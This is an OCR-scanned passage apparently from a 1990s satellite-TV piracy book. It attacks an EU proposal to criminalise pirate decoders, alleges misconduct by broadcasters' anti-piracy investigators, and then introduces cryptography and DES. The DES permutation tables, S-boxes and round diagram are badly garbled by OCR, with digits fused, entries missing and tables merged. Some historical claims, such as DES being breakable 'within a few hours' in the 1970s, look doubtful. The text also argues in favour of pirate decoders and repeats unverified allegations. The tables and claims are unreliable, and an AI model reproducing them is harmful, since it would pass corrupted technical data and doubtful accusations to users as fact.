The figures quoted in the table of subscribers to the main pay television 
stations are wrong in that they have no entries for Ireland. Sky One, Sky 
News, MTV and TCC are part of the lowest tier on Cablelink's net. Cablelink 
has over 400,000 subscribers in Ireland. So this is a large number to have 
gone missing. The satellite subscribers are also ignored. It seems that 
those responsible for the figures, the European Audiovisual Observatory, 
have reintegrated the UK with Ireland. There are some people in Ireland 
who will not be pleased. 


Some of the speculation in the paper would be comical if it was not so 
pathetic. A particular example of this is where the paper refers to the loss on 
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credibility to a supplier of technology that a hack causes and how a high 
incidence of pirate devices might be construed as evidence that a system is 
not very effective. 


These people do not live in the real world! If a system is hacked, then it is 
impossible to consider it secure. If there are a lot of pirate devices then it is 
proof that the system is not very effective. 


Hiding the facts behind a smokescreen of platitudes is what has being going 
on with hacked channels for the last few years. The people who framed this 
document appear to be too worried about upsetting the victims of piracy. 
Serious questions as to their knowledge of the subject and fitness to 
undertake such a task should be asked. The document, in places, sounds 
more like a broadcaster's wish list. But then that is not surprising, the 
broadcasters spend a lot of money lobbying the European Commission and 
indeed the governments of the countries where they operate to draft 
legislation that favours their position. 


While the paper seems to take some notice of the Council of Europe 
recommendations on piracy, the one thing that it does not specifically 
mention is the option of the hacked service taking legal action against the 
company that sold it the hacked encryption system. 


It is now common practice to have companies who supply scrambling 
Systems on a performance contract. If the system gets hacked then these 
companies do not get paid. But if it can be established that these scrambling 
system manufacturers knowingly used technology and techniques that they 
knew to be compromised then they should be liable to prosecution. 


In section 2.1 the paper refers to a situation where a disclosure in a court 
case of the the software in the official smart card in order to prove 
infringement would result in further copying is based on a faulty understand- 
ing of what happened in BSkyB & News Datacom Vs David Lyons, 
otherwise known as the Dublin Court Case. 


In this case it was proposed to the court and BSkyB & News Datacom's 
counsel that David Lyons' software would be disclosed in confidence to a 
court appointed expert if News Datacom would also disclose in confidence. 
Needless to say News Datacom did not disclose. It was a game of chicken 
and BSkyB and News Datacom lost. 


The point here is that it should be possible to disclose the algorithm, without 
a necessarily valid set of keys. The algorithm should be strong enough to 
resist attacks. Had such an approach been adopted by News Datacom, 
instead of the security by obscurity, then much of the problems created by 
that case would probably not exist. 
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The document makes reference to the DVB experts’ group on the piracy of 
encrypted services. The only thing that these people seem to be expert on 
is on developing systems that keep getting hacked. Now | think that that 
makes them experts on being pirated rather than experts on piracy. It brings 
to mind sheep discussing the order of the wolves’ menu. | am not sure if 
these are the people behind the recommendation that the possession of 
pirate digital decoders or devices should be criminalised. It seems that this 
recommendation is based on the ignorance of enforcing such an option. 
They have probably been watching Sky One for too long. 


It is also the basis for the creation of mediocre security systems. Piracy is a 
very good test of how successful a channel or service is. Pirates do not 
attack unpopular channels. Of course the more important thing here is that 
the criminalisation of the possession of pirate decoders would allow the 
perpetuation of mediocre systems. 


The idea of criminalising the possession of a piece of electronics is, to say 
the least, repulsive. It is like these people have something to fear from 
technology. Perhaps it is, in a word, technofear. It would be interesting to 
see exactly how technical the people behind this idea are. They seem to be 
Neo-Luddites. 


They see their controls failing as society casts aside the chains that bound it 
for the last few hundred years. Technology is having a liberating influence 
and these people don't like it. It seems that they want to impose а 
technological dictatorship where all access to iffy information and technol- 
ogy is carefully controlled. They probably would be more at home back in 
Mao’s Communist China. 


At the heart of this argument is what constitutes a pirate digital decoder. 
Perhaps the simplest explanation is that it is a device that is used to gain 
unauthorised access to a service. The definition would also include pirate 
smartcards. Of course the idea that possession of such a device should be 
criminalised is easy to come up with, especially if a channel has had legal 
actions collapse in courts. 


Considered in this light it is a knee-jerk reaction to the failure of these court 
cases. The reality however is that most of these court cases collapse 
because of the managerial incompetence and lack of knowledge by the 
people responsible for taking the action in the first place. You tend to come 
to this conclusion when you hear arguments in court that “the magnetic 
stripe in the smart card had been copied”. Of course these actions are all 
civil law actions and not criminal law. By criminalising the situation, it would 
place the matter in the hands of the police thus simplifying things 
considerably for the channels. 
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It is an idea without a hint of justice intended to cover the fact that the 
system that allowed to to happen in the first place was mediocre at best and 
irresponsibly designed at worst. It seems the concepts of justice and 
fairness matter little to those whose bottom line is that of the balance sheet. 


Criminalising the possession of pirate digital decoders and subsequently 
allowing for their seizure is fundamentally wrong both logically and 
financially. It would be a far more elegant solution to turn someone in 
possession of a pirate digital decoder into a legitimate subscriber by court 
order. In that way they would have to subscribe to the hacked service for a 
year or so. So rather than the service losing revenue, they would gain 
revenue. The user of the pirate decoder gets to watch what he wanted and 
the service gets money. It is perhaps a druidic interpretation of things. But it 
should be remembered that a channel is in business to make money not to 
make criminals. 


The flawed thought processes of those who would criminalise the posses- 
sion of pirate decoders are apparent in the arguments used about illicit 
drugs. The people who advocate the criminalisation of the possession of 
pirate decoders obviously have not paid any attention to the way that the 
same logic has been disastrous with the drugs problem. 


Europe has the most vibrant satellite television business in the world. It has 
so because of piracy and an almost complete lack of centralisation. There 
are perhaps more systems used in Europe than anywhere else. These 
systems have been tested both by the market and by the hackers and 
pirates that attack them. The manufacturers, if they are lucky, learn how to 
improve their systems so that they become more secure. The end up with a 
product that can be marketed world-wide. Of course some manufacturers 
fail because their system is too insecure but this can be considered 
technological Darwinianism - evolution in progress. 


The other aspect of the criminalisation of pirate decoders is that it is aimed 
specifically at the citizen of the European Union. Perhaps the people in the 
European Commission should realise that they are working for us - the 
people and not for the broadcasters. If enough people are criminalised, then 
life will become very unpleasant for the people responsible in the European 
Commission and elsewhere. 


A more worrying trend here is marked by its omission. What will happen to 
the people who have an interest in how these things work? If some of the 
people working for the broadcasters had their way, nobody would know 
anything about their systems. The ramifications of this are staggering. 
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At the worst, engineers and technicians would be unable to examine the 
technology or systems without the risk of being criminalised. People would 
not be able to examine their systems and understand how it works or carry 
out experiments. 


It would throw a potential industry back to the Stone Age. Knowing how 
things work is an essential part of building any system. There would be no 
more new systems, other than those produced by the broadcasters. 


There are the possible spin-off industries that can be, and have been, 
created. Some pirates and hackers have come up with systems that are 
more secure and elegant than the ones they have hacked. Some have even 
explained how to make systems more secure. To put it simply, hacking 
expands Human Knowledge. That is a good thing except to those who 
would seek to limit it. 


European companies can either build on the massive array of experience in 
signal security/insecurity that has been built up over the last ten years or the 
Commission can render all of that expertise and potential taxation revenue 
void with stupid and ill-conceived legislation. 


There are however some indications of light breaking through. The 
comment that the Commission is considering establishing an organisation 
for control and certification of security systems independent of public 
authorities is interesting. This is a worrying spectre of a European Big 
Brother operation. But it does offer some hope that there will be some 
analysis of the access control systems used on Digital Television systems 
instead of the security by obscurity approach that seems to be the norm at 
present. 


The European Commission can draft fair legislation that will benefit the 
channels and the citizens of Europe equally. Or it can take the heavily 
biased advice of the incompetent fools who let the piracy situation develop 
in Europe over the last ten years. 


The events of the D2-MAC EuroCrypt fiasco do not inspire confidence. It 
was an attempt to protect European jobs and industries but it definitely went 
against the market. The relevant commissioner at the time was heavily 
quoted as relying on the advice of the main manufacturers of D2-MAC 
equipment and chipsets. It was not the wisest of statements even if the 
intentions were good. However the current situation is different. It is not 
about protecting jobs. It is about implementing legislation that will protect the 
channels and will also ensure a fair treatment for the subscribers to these 
channels and services. 
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Some of the suggestions, made by the channels and their cohorts, are 
clearly wrong. The criminalisation of the possession of pirate decoders and 
smart cards is just one of these. It demonstrates shortsightedness because 
instead of creating a subscriber, they create any enemy. The channels 
should terminate the persons responsible for this suggestion. 


Counter-Piracy Today 


From the events that followed the hack on 07 VideoCrypt, it was evident that 
Sky and News Datacom did not have any real counter-piracy program. The 
had strangely removed Ken Crouch and his department. In fact it seemed 
after the demise of Sky's only counter-piracy operation that their new 
operation was run by ordinary people. Perhaps they were lawyers and some 
security consultancy but they were by no stretch of the imagination 
counter-pirates. In the terms of the Blackbox Industry they were JAFAs. If 
they were anything other than JAFAs the 07 hack would not have had the 
effect that it had. 


It has become clear from court actions that the people used for these 
operations by Sky are generally ex-police. The problem here is that the idea 
of counter-piracy has become confused with that of anti-piracy. Counter- 
piracy by its nature is intended to limit piracy or redirect it in a useful 
manner. Anti-piracy, with all of the negative connotations, is designed to 
completely eradicate piracy. Basically it is the search for the Holy Grail of a 
totally secure system with no piratical users. Anti-piracy is also a term 
beloved by the clueless. 


The whole situation of fighting piracy has become very dirty over the last few 
years. Even in areas where the channel is protected by law, there is still the 
aspect of proof that continues to cause problems for the channels. It is not 
sufficient for those working for a channel to allege that someone is involved 
with pirate devices. They have to present proof. This means a lot of 
paperwork and investigation. 


Where as system is massively compromised, as the Sky 07 and 09 were 
and D2-MAC EuroCrypt-M is, it is not economically viable to pursue all of 
the pirates and pirate card users. Therefore the anti-pirates have to target 
those whom they have a reasonable chance of getting a court to convict. 


It is now a common practice to try and insinuate that hackers and pirates 
are involved in things other than piracy. The commonest seems to be the 
allegation that the hacker or pirate is involved in manufacturing phonecard 
emulators. These anti-pirates generally trade on the credibility of their 
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ex-police background by approaching contacts in the relevant telecoms 
company or police force with these “tip-offs”. 


Of course false allegations are not the only tool that these anti-pirates use. 
They also actively set up pirates and then invite the cooperation of the 
relevant police. The normal approach is that a pirate with the necessary 
software is approached with a deal that is, on the surface too good to be 
true. Then the scheduled hand-over is replaced by a raid from the relevant 
police force. 


Depending on the jurisdiction, this kind of approach would be termed 
entrapment and the legal status of such a raid may vary from country to 
country. It is especially complicated by the fact that the channel may not 
have any legal protection other than copyright under the country's law. In 
fact some people have commented that some of these cases may be void 
as there was no actual fraud taking place other than the misrepresentation 
by the anti-pirates and the fact that they were intent on stealing the software 
developed by the hackers and pirates. Now it would be interesting if some of 
the hackers and pirates who are victims of such attempted entrapment 
decide to take a case against these anti-pirates for fraud and misrepresen- 
tation. 


Indeed some of the tactics used by these anti-pirates seem questionable in 
law. It would not be unthinkable to see a case brought on evidence supplied 
by these people being thrown out. There would have to be a very clear 
distinction between the channel and the company undertaking the anti- 
piracy. If a situation went bad and the channel was implicated directly, the 
press would have a feeding frenzy. 


There are too many unverifiable rumours, cash bribes to serving officers, 
illegally tapped phonelines, private detectives masquerading as customers, 
compromised people being rapidly relocated. There is a very real possibility 
that the tactics used are illegal and if these rumours were to turn into 
verified facts, these people and their accomplices would be up on charges. 


It is also in the best interests of the anti-pirates to have a third party involved 
as the legal entity executing the raid. This has special relevance in the case 
of an Anton Piller order. This an order whereby the premises of a pirate can 
be searched for evidence of copyright infringement. There are some 
controls associated with the granting of one of these orders. The most 
important is that it cannot be used as a licence for a fishing expedition. In 
other words, it cannot be used to see what charges can be laid later. The 
way that the anti-pirates get around this is by using a third party and then 
“helping” the third party by being their advisors on copyright infringements. 
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Most of these questionable actions are necessary because the channels 
cannot avail of the legislation in countries other than where their signal 
originates. The legislation in most countries in Europe only protects 
channels that broadcast from that country. It does not protect foreign 
channels. 


Other channels seem to be learning from the mistakes of News Datacom 
and Sky. Though it is believed that they still have not created an adequate 
counter-piracy program yet, France Telecom are trying to fight the hacks on 
their EuroCrypt system. With EuroCrypt, it would seem that the strongest 
part of the system is ignored and left virtually unused. If a channel does not 
use a system properly, then it will be hacked. It would be better if the 
channels actually used the system properly rather than involving snakeoil 
salesmen to try and sort out the problems of piracy by legal means. 


Perhaps the main problem with many channels is that they believe that their 
own people, specifically their corporate security people, can stop hacking. 
Hacking and piracy are things that many of these corporate security types 
have little understanding of. The knowledge and tactics required to limit 
piracy can only be gained in one way. 


The idea that a career in law enforcement prepares someone for counter- 
piracy operations is wrong. Such people generally see things in black and 
white and have relatively straightjacketed minds. As a result they tend to go 
for the legal options to eliminate piracy. This approach is both clearly wrong 
and very dangerous. Nowhere was this better illustrated than when DirecTv 
announced that it would stop Grey market sales in Canada with court 
actions. This move displayed a breathtaking incomprehension of the 
distinction between Grey market piracy and Black market piracy. Grey 
market piracy, properly exploited by the channels can reduce the effects of 
Black market piracy. 


With the unified legislation on piracy in Europe, things will evidently worsen. 
Satellite piracy, through the abject incompetence and failure of the 
channels, has only gone from strength to strength. The channels are the 
ones who must sort this problem out by using properly designed and 
deployed systems. Then if there is piracy, the governments may be inclined 
to protect the channels with legislation. 


With the unified legislative area in Europe, such extreme measures may 
well become unnecessary. However the fact that Europe will remain a 
fragmented copyright for the near future leads to the conclusion that piracy 
will continue regardless of legislation. Perhaps the European Commission 
will have the sense to ask the rights organisations to implement a single 
copyright area before the relevant legislation is drafted. Furthermore the 
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Commission should make it a condition for implementing this legislation. 
Otherwise the impression that the broadcasters have paid for this piece of 
legislation will persist. 


Unless these channels become actively involved in protecting themselves, 
no government should bother enacting further legislation. The channels 
should be careful and remember the old saying about “he who fights 
monsters”. Meanwhile pirates are assured of an interesting, if nomadic, 
experience. 
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This chapter is a basic introduction to cryptology and access control. The 
field of cryptology is highly specialised and is intensely mathematical. There 
are essentially two sub-fields; cryptanalysis and cryptography. Cryptanalysis 
is effectively hacking. Cryptography is the development of code systems. 


Access control is the denial of access to unauthorised users. This may 
seem a rather negative definition but it should be remembered that an 
access control system is designed with attack in mind. To win, a hacker has 
to conquer. In order for the cryptosystem to win it only has to survive. This is 
the defender's advantage. 


In an ideal world, peace protesters would feel really out of place. Access 
control is a real world concept. The access control system used on a 
Scrambling system has to be secure from hacking or at least not 
economical to hack. A good cryptographical system is essential. 


While a good cryptosystem is essential but it is not the element that ensures 
security. The technology of the decoder and the smart card is, in the final 
assessment, the one thing that makes the difference. 


All of the smart card based hacks of the last four years have been based on 
the algorithms and keys being extracted from the official smart cards and 
being emulated on pirate smart cards. The technology of the smart cards is 
clearly at fault here. The algorithms and keys, had they not been extracted 
would not, generally, have been hacked by other methods. І do not include 
EuroCrypt-M in this group as it uses DES. 


The 07 Ho Lee Fook hack on VideoCrypt was perhaps the most 
embarrassing thing ever to befall Sky and News Datacom. Well at least until 
the 09 and 10 Ho Lee Fooks. They had for years proclaimed that their 
system would defeat the hackers. News Datacom management people 
were interviewed by some reporters in the satellite TV press. These 
clueless individuals were easily convinced that VideoCrypt was the best 
system since the invention of sliced bread. This of course indicated that 
these reporters knew more about sliced bread than satellite television 
technology. 


It was such a shame that the hackers never believed these claims. The full 
details of the algorithms that the hackers used to hack the VideoCrypt 07 
and 09 cards are given in this chapter. Of course it is often said that we 
learn by our own mistakes. In this business, if we are lucky, we learn by the 
mistakes of others. 
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Relying on a published specification is potentially fatal. It allows the hackers 
to develop models of the system under attack. In some cases where a 
published specification was used, the full implementation was not used. For 
example EuroCrypt-M used DES with the Initial Permutation and inverse 
Initial Permutation removed. It has been suggested that this was actually a 
cunning plan by France Telecom to make the hackers too busy laughing to 
hack. 


Cryptography - The Basics 


Encryption And Key Distribution 


The procedure by which the original data, referred to as "plaintext" is 
encrypted and turned into encrypted data or “ciphertext” is called the 
encryption algorithm or key. The most basic formula is shown below. 


f(Plaintext + Key) = Ciphertext 
Where f is the algorithm 


The security of an encryption system is dependent on the non-linearity of 
this algorithm. If there is a visible relationship between the plaintext and the 
ciphertext then it is highly probable that the system can be hacked. If the 
relationship is so non-linear that there is no immediately discernible 
correlation, then the algorithm is substantially more secure. 


The concept of encrypting a signal is extremely simple. There are two basic 
processes, substitution and permutation, that are are generally combined 
together in order to increase system security. 


Substitution is where one element of a signal is replaced by another 
element. For example, DDSO might become 2456. In this example, the 
letters have been replaced by numbers. The ASCII codes used on 
computer is essentially a substitution coding system. Each letter is assigned 
a number. The numbers can then be stored in the computer in their binary 
equivalent. 


Permutation is where the bits in a system are scrambled or mixed into 
another order. For example, ABCDEF might be translated to BACDEF. In its 
basic form, this is the simplest system to break. In each language, certain 
letters are statistically more likely to occur. In English, the commonest 
letters are E,T,N,A. Then there are other statistical occurrences such as 
letter pairs like TH, ST and EE. 
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When these basic techniques are used together to securely encrypt data 
streams, the combination is termed a product cipher. 


Sometimes one or more fixed blocks of data are encrypted using a product 
cipher. This application is termed a block product cipher. The Data 
Encryption Standard, DES, is a block product cipher. 


The function of the key in an encryption algorithm is identical to the function 
of a key in a lock. The algorithm can be considered as a lock. When turned 
in one direction, the key locks or encrypts the data, when turned in the other 
direction, it unlocks or decrypts the data. 

The simplest algorithm uses the digital “exclusive or’, EXOR, function. 
When two digital bits are compared in this function, the output is high when 


only one of the bits is high. If both bits are high or both bits are low, then the 
output is low. 


Encryption Example Using EXOR Function 


In this example, the word CAT is encrypted with the word DOG as the key. 
Using ASCII codes, the letters can be represented by a series of numbers; 
thus CAT becomes 67, 65, 84 and DOG becomes 68, 79, 71. If these 
numbers are translated into their binary forms, the EXOR function can be 
applied: 

CAT = Plaintext DOG = Key 

CAT (data) 010000110100000101001100 

DOG (key) 010001000100111101000111 


Output 000001110 000111000001011 
CAT 676584 
DOG 687971 


Ciphertext 071411 
The key returns the ciphertext to plaintext using the same EXOR function: 


Decryption Example Using EXOR Function. 


Output (cipher) 000001110000111000001011 
DOG (key) 010001000100111101000111 
CAT (data) 010000110100000101001100 
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As can be seen by comparison, the plaintext is returned by EXORing the 
ciphertext with the key. The sender and the receiver must be in possession 
of the key to make the system work. Although this is an exceedingly simple 
method of encrypting a datastream, in real world systems the key length is 
generally very large so the system is more resistant to hacking and secure. 
A simple EXOR cipher is also very dangerous. 


The problem with scrambling systems is that the information being 
encrypted is not plain English or indeed any other language. It is seed 
information, channel authorisation data or tiering data. Essentially this kind 
of data is exactly that - data; a stream of binary or hexadecimal. The crypto 
algorithms encrypt and decrypt this data. 


The following are examples of some crypto algorithms. Many of the 
scrambling systems on the market do not employ the algorithms straight off 
the page. Instead they make modifications to the algorithms that complicate 
things for the potential hacker. In some cases, these modifications are 
necessary to allow the decoder or smart card to process the data. In others, 
these modifications make the algorithm more secure. 


The Data Encryption Standard 


Over the last few years, the Data Encryption Standard has come in for some 
intense study. Though originally the algorithm was analysed by academics 
and defence experts, it was the VideoCipher hack that really brought it to 
the attention of the hackers. 


However the main application of the algorithm in Europe has been as part of 
the EuroCrypt-M system. The differences between 1985 and 1996, in terms 
of computing power are vast. While in 1985, DES was a good algorithm, in 
1996 it is not strong enough for sensitive applications. It has largely been 
replaced by Public Key based algorithms such as RSA. 


The first form of DES was created by IBM in 1971. It was named Lucifer and 
was sold to Lloyds. The algorithm as it then existed was not extremely 
secure though very few people had the computer power to hack it. 


By 1974, the algorithm had been reinforced. The Lucifer algorithm had a 
128 bit key. The US National Bureau Of Standards saw a need for a 
standard encryption algorithm that could be used for non-classified govern- 
ment data. The version submitted to the NBS had the key reduced to 64 
bits. 


The National Security Agency is the electronic eyes and ears of American 
defence. While the Central Intelligence Agency deals with the ground truth 
and analysis operations, the NSA monitors all electronic emissions of 
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interest. A 128 bit key DES algorithm would take longer to hack. The 56 bit 
key version could be hacked within a few hours. The NSA had advised IBM 
on the creation of certain elements of the algorithm. 


For use as the Data Encryption Standard, the key was weakened and other 
areas of the algorithm were strengthened. This was necessary so that the 
NSA could hack the DES if required. This was a natural move for NSA. 
There are those who would protest at such a manipulation but then they are 
ignorant of the world of electronic intelligence. It would be the height of 
stupidity to provide one’s enemies with a near unhackable cipher system. 


The NBS approved the modified Lucifer algorithm for use as the Data 
Encryption Standard on 15:06:1977. It was documented in the Federal 
Information Processing Standards Publication 46, (FIPS PUB 46). 


The VideoCipher ІІ scrambling system used the DES as the basis for 
encrypting its digital audio data. As a direct result, more computer time and 
mind power was tied up attempting to hack it inside the USA than outside. 
According to some reports this disturbed the US government departments. 
The algorithm was never hacked in the sense that someone came up with a 
general solution. There have been a number of papers on hacking the DES. 
However the time frames involved would make the hacks unusable. As in 
most scrambling system applications the DES key changes monthly, weekly 
or daily, a hack that produced the correct key in a few months is logically 
useless unless you have recorded the programme and the datastream. 


The use of the DES algorithm here in Europe has been somewhat sporadic. 
The most obvious use has been as the hash function in the France Telecom 
EuroCrypt-M specification. At the time, circa 1987, it was considered to be 
cryptographically secure and therefore France Telecom used this as the 
basis for their system. Of course with the current proliferation of the hacker 
software for EuroCrypt-M, it is difficult to understand why they continue to 
use this algorithm. 


There are a few methods of implementing the DES. The method that 
concerns us is the Electronic Code Book mode. This generates ciphertext 
from a 64 bit plain text block and a 64 bit key. This version is the one most 
commonly used in scrambling system applications. Often the initial and end 
permutations are removed to make the algorithm run faster in software. 
This is exactly how it is used in the EuroCrypt-M system. 


There are two basic forms of encryption; permutation and substitution. The 
permutation form merely changes the position of the bits in the sequence. 
The bits retain their same value either 1 or 0. In some cases the word 
transposition is used to describe the technique. The substitution form of 
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encryption actually changes the value of the bits. An encryption scheme 
using both of these forms is generally referred to as a product cipher. 
Because the input and output are in blocks of bits, the DES format is 
referred to as a block product cipher. 


ө Electronic Code Book Mode 


Key Generation 


The first stage of the DES algorithm is the PC-1 
generation of the keys. These keys are generated 

from the keyword which is 56 bits wide. The bits 57 49 41 33 25 17 09 
8, 16, 24, 32, 40, 48, 56, and 64 are parity bits 0158 50 42 34 26 18 
and are not used іп the key generation proce- 10 02 59 51 43 35 27 
dure. The parity is odd. 19 11 03 60 52 44 36 


The Keyword, less the parity bits is fed into а 1 63 55 47 39 3123 15 
row by 56 column permutation. The permutation 07 62 54 46 38 30 22 
is then split into two smaller 1 row x 28 columns — 1406 61 53 45 37 29 
permutations. The top permutation is used as CO 21 13 05 28 20 12 04 
and the lower as DO. 


The permutation is referred to in the diagram as 

PC-1 or permutated choice 1. Bit 57 would be the first bit of CO, bit 49 the 
second and bit 36 the last. Bit 63 would be the first bit of DO and bit 4 would 
be the last. 


In order to obtain the keys, the bits of CO and DO are left shifted by one or 
two bits over the procedure. A left shift applied to CO would result in 57 
going to the end. The new first bit would be 49 and the new end bit would be 
57. 


The left shift is a lot less complicated than it sounds. It is also easily 
implemented in software or in hardware. The left shift function is a common 
function available in most assembler level languages. The function is also 
available in some of the higher level languages such as C. 


The keys are generated from the blocks by taking each block Cn and Dn 
and inputting them into the permutation PC-2 or permutated choice 2. This 
is a 1 row x 48 column permutation. The key length is 48 bits wide. 


The numbers in this permutation refers to the relative position of the bits of 
the extended block [Cn, Dn]. The first bit of Cn would be the first bit of PC-2. 
The last bit of Cn would be bit 28 of PC-2. The first bit of block Dn would be 
bit 29 of PC-2 and the last bit of Dn would be bit 56 of PC-2. 
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DES KEY GENERATION 
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The process of key generation would be fast at machine code level and 
even faster using dedicated circuitry. It is this element of speed that has led 
some people to consider that it could be hacked using a parallel attack. 


Other attacks such as the Biham Shamir Differential Cryptanalysis of DES 
and Matsui's Linear Cryptanalysis of DES have started to chip away at the 
edifice. The paper on the DES Cracking engine by Weiner has demon- 
strated that a DES Cracking engine is feasible for what is now a relatively 
small investment. 


The advances in technology have rendered this algorithm insecure for any 
sensitive application. Some one specifying this algorithm for use in a 
sensitive application should have his head checked, preferably as part of a 
post-mortem examination. 


PC-2 

141711240105 
03 28 15 06 2110 
231912042608 
16 07 27 2013 02 
415231374755 
30 405145 33 48 
44 493956 3453 
46 42 50 36 29 32 


C0 

57 49 41 3325 17 09 
01 58 50 42 34 26 18 
10 02 59 51 43 35 27 
19 11 03 60 52 44 36 
DO 

63 55 47 39 3123 15 
07 62 54 46 38 30 22 
14 06 61 53 45 37 29 


Left Shift Table 
Step Step Step Step 


011 052 091 13 2 
022 062 102 142 
032 072 112 152 
042 082 122 161 


21 13 05 28 20 12 04 


The DES Encryption Routine 


The DES encryption routine is a complex and non-linear routine. The 
reason for this is security. There must be no discernible relationship 
between the input data or Plaintext and the output data or Ciphertext. 


The input block or plaintext is 64 bits wide. The block is first subjected to 
permutation by insertion into the following 1 row x 64 column permutation 
designated IP. The permutation is then split into two 32 bit blocks. These 
are designated LO and RO. LO contains the first 32 elements and RO 
contains the second 32 elements. 
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LO 
58 50 42 34 26 18 10 02 
60 52 44 36 28 20 12 04 
62 54 46 38 30 22 14 06 
64 56 48 40 32 24 16 08 


RO 
57 49 41 33 25 17 09 01 
59 51 43 35 27 1911 03 
61 53 45 37 29 2113 05 
63 55 47 39 31 23 15 07 


The basic step process of the routine can be thought of as a set of modules. 
Starting with LO and RO, RO and the first key, K1 are inserted into the 
encryption / decryption function module, f. The output of the encryption / 
decryption function module, f, is EXORed with LO. The output of the EXOR 
operation provides the new R1 block. The block RO becomes the new L1 
block. This circulation continues as far as L15 and R15. 


The blocks L16 and R16 are called the Preoutput. Their sequence is [R16, 
L16]. R16 is L15 EXORed with the output from the encryption/decryption 
module function, f. The encryption function module inputs are R15 and K15. 
The Preoutput block is inserted into the inverse initial permutation. 


Initial Permutation Inverse Initial Permutation 


58 50 42 34 26 18 10 02 
60 52 44 36 28 20 12 04 
62 54 46 38 30 22 14 06 
64 56 48 40 32 24 16 08 
57 49 41 33 25 17 0901 
59 51 43 35 27 19 11 03 
61 53 45 37 29 21 13 05 
63 55 47 39 3123 15 07 


40 08 48 16 56 24 64 32 
39 07 47 15 55 236331 
38 06 46 14 54 22 62 30 
37 05 45 13 53 21 61 29 
36 04 44 12 52 20 60 28 
35 03 43 115119 59 27 
34 02 42 10 50 18 58 26 
33 01 41 09 49 17 57 25 


The inverse initial permutation provides the output block. This block is the 
Cipher text and is 64 bits wide. 


The Encryption/Decryption Function - f 


The actual operation of the function module is relatively simple. It appears 
complex, but it must be remembered that the process is optimised for a 
computer and not for a human mind. 


The R block is 32 bits wide. This block has to be expanded to a 48 bit wide 
block. The permutation used for this operation is designated the E-Bit 
Selection Table. The numbers refer to the bit positions in the R block. 


The 48 bit wide block generated from the R block by E is then EXORed with 
the key to produce a 48 bit wide block. This block is split into eight 6 bit wide 
sections. These 6 bit wide sections are inputted to eight selection function 
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Plaintext Input Block 


DES Encryption 
Routine 


















R1=LO EXOR Г F<ROKI) 1 





Re=L1 EXOR Г f(RLK2) 1 


| | 
RiS=L14 EXOR С #‹14,К15) 1 


15 = R14 












Ri6=L15 EXOR Г fCR15,K16) 1 


L16 = R1S| PREDUTPUT 
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modules, S1 to S8. These modules select a 4 bit block for the 6 bit input 
section. These modules are 4 row x 16 column matrices. Since we are 
dealing with binary numbers, it is necessary to һауе a row 0 and а column 0. 


The first and last bits of the 6 bit input section are used to define the row. 
The possible combinations are 00, 01, 02, 03. These equate to 0, 1, 2, З in 
the decimal base. 


The remaining four bits of the 6 bit input section are used to define the 
column. The range of the bits is from 0000 to 1111 or in decimal base from 
О to 15. 


To illustrate the concept, we will use 010111 as the input section for S1. The 
first and last bits define the row. Therefore the row is 01 or row 1. The 
remaining bits are 1011 or in decimal, 11. Therefore the column is 11. 


The row number is 1 and the column number is 11. By checking the value of 
the number at this co-ordinate in the S1 permutation, we obtain the four bit 
number. The value of the number at this location is 11 or in binary, 1011. 


This operation is carried out for the eight 6 bit input sections and their 
respective selection function modules or matrices. The result is a 32 bit 
wide block. 


The S-Boxes E-Bit 

51 Selection Table 
14 04 13 01 02 15 11 08 03 10 06 12 05 09 00 07 32 01 02 03 04 05 
00 15 07 04 14 02 13 01 10 06 12 11 09 05 03 08 04 05 06 07 08 09 
04 01 14 08 13 06 02 11 15 12 09 07 03 10 05 00 08 09 10 11 12 13 
15 12 08 02 04 09 01 07 05 11 03 14 10 00 06 13 12 13 14 15 16 17 
S2 16 17 18 19 2021 
15 01 08 14 06 11 03 04 09 07 02 13 12 00 05 10 20 21 22 23 24 25 
03 13 04 07 15 02 08 14 12 00 01 10 06 09 11 05 24 25 26 27 28 29 
00 14 07 11 10 04 13 01 05 08 12 06 09 03 02 15 28 29 30 31 32 01 
13 08 10 01 03 15 04 02 11 06 07 12 00 05 14 09 


53 

10 00 09 14 06 03 15 05 01 13 12 07 11 04 02 08 
13 07 00 09 03 04 06 10 02 08 05 1412111501 
13 06 04 09 08 15 03 00 11 01 02 12 05 101407 
01 10 13 00 06 09 08 07 04 15 14 03 11 05 02 12 
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R Block 32 Bits 





DES ENCRYPTION/ 
DECRYPTION FUNCTION f 














FRK) 32 Bits 
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S4 

07 13 14 03 00 06 09 10 01 02 08 05 11 12 04 15 
13 08 11 05 06 15 00 03 04 07 02 12 01 10 14 09 
10 06 09 00 12 11 07 13 15 01 03 14 05 02 08 04 
03 15 00 06 10 01 13 08 09 04 05 11 12 07 02 14 
S5 

02 12 04 01 07 10 11 06 08 05 03 15 13 00 14 09 
14 11 02 12 04 07 13 01 05 00 15 10 03 09 08 06 
04 02 01 11 10 13 07 08 15 09 12 05 06 03 00 14 
11 08 12 07 01 14 02 13 06 15 00 09 10 04 05 03 
S6 

12 01 10 15 09 02 06 08 00 13 03 04 14 07 05 11 
10 15 04 02 07 12 09 05 06 01 13 14 00 11 03 08 
09 14 15 05 02 08 12 03 07 00 04 10 01 13 11 06 
04 03 02 12 09 05 15 10 11 14 01 04 06 00 08 13 
S7 

04 11 02 14 15 00 08 13 03 12 09 07 05 10 06 01 
13 00 11 07 04 09 01 10 14 03 05 12 02 15 08 06 
01 04 11 13 12 03 07 14 10 15 06 08 00 05 09 02 


P Permutation 


16 07 20 21 
06 11 13 08 01 04 10 07 09 05 00 15 14 02 03 12 29122817 
58 01052326 
13 02 08 04 06 15 11 01 1009 03 14 05 00 12 07 05183110 
01 15 13 08 10 03 07 04 12 05 06 11 00 14 09 02 02 08 24 14 
07 11 04 01 09 12 14 02 00 06 10 13 15 03 05 08 32 27 03 09 
02 01 14 07 04 10 08 13 15 12 09 00 03 05 06 11 19 13 30 06 


The 32 bit wide output from the selection modules, S1 to S8, is inputted to 
the P permutation which is 1 row x 32 columns. The permutation is referred 
to as the Permutation Function P. The numbers refer to the position of the 
bits in the 32 bit wide output from the selection modules. The numbers run 
from left to right. 
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DES Decryption Routine 


The same algorithm is used for decryption. The key application sequence is 
reversed. The sixteenth key, K16, is used in the first place or round and the 
first key, K1, is used in the last round. 


There are a number of keys for which another key exists. These keys 
produce all zeros or ones or an alternating zero one pattern after the first 
step of the key generation routine. 


The other DES modes are Cipher Block Chaining, (CBC); Cipher Feedback, 
(CFB) and Output Feedback, (OFB). These modes are more secure than 
the basic Electronic Code Book mode. 


While these other modes are arguably more secure, they are not used that 
much in scrambling systems. The primary reason for this is that most of the 
implementations of DES are software based and these modes would create 
more of a load for the microcontroller. A secondary reason is that the 
